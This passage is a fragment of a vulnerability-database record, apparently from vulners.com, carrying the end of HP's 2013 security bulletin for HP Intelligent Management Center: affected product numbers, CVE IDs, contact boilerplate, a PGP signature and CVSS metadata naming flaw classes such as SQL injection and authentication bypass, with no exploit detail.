Platform w/200-node Lic JF378AAE HP IMC Ent S/W Pltfrm\r\nw/200-node E-LTU JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU\r\n CVE-2013-4825\r\n\r\nIMC Service Operation Management Software Module\r\n HP_iMC SOM 7.0 (E0101)\r\n JG139A HP IMC SOM S/W Module License JG139AAE HP IMC SOM S/W Module E-LTU\r\n CVE-2013-4824 CVE-2013-4826\r\n\r\nIMC Application Performance Manager Software Module\r\n HP_iMC_APM_7.0_E0101\r\n JG489A HP IMC APM S/W Module w/25-monitor Lic JG489AAE HP IMC APM S/W Module\r\nw/25-monitor E-LTU\r\n CVE-2013-4827\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 8 October 2013 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlJUbxgACgkQ4B86/C0qfVmN4QCeLq7cUda/UyZamCTtN+VixixG\r\nnh0AoMUjDTXZL9x9p4sGg7Q5/EXF8dfR\r\n=7xuS\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2013-10-09T00:00:00", "published": "2013-10-09T00:00:00", "id": "SECURITYVULNS:DOC:29907", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29907", "title": "[security bulletin] HPSBGN02930 rev.1 - HP Intelligent Management Center(iMC) and HP IMC Service Operation Management Software Module, Remote Authentication Bypass, Disclosure of Information, Unauthorized Access, SQL Injection", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "cvelist": ["CVE-2013-4823", "CVE-2013-4824", "CVE-2013-4825", "CVE-2013-4822", "CVE-2013-4826", "CVE-2013-4827"], "description": "Code execution, authentication bypass, SQL injection, unauthorized access.", "edition": 1, "modified": "2013-10-09T00:00:00", "published": "2013-10-09T00:00:00", "id": "SECURITYVULNS:VULN:13339", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13339", "title": "HP Intelligent Management Center multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
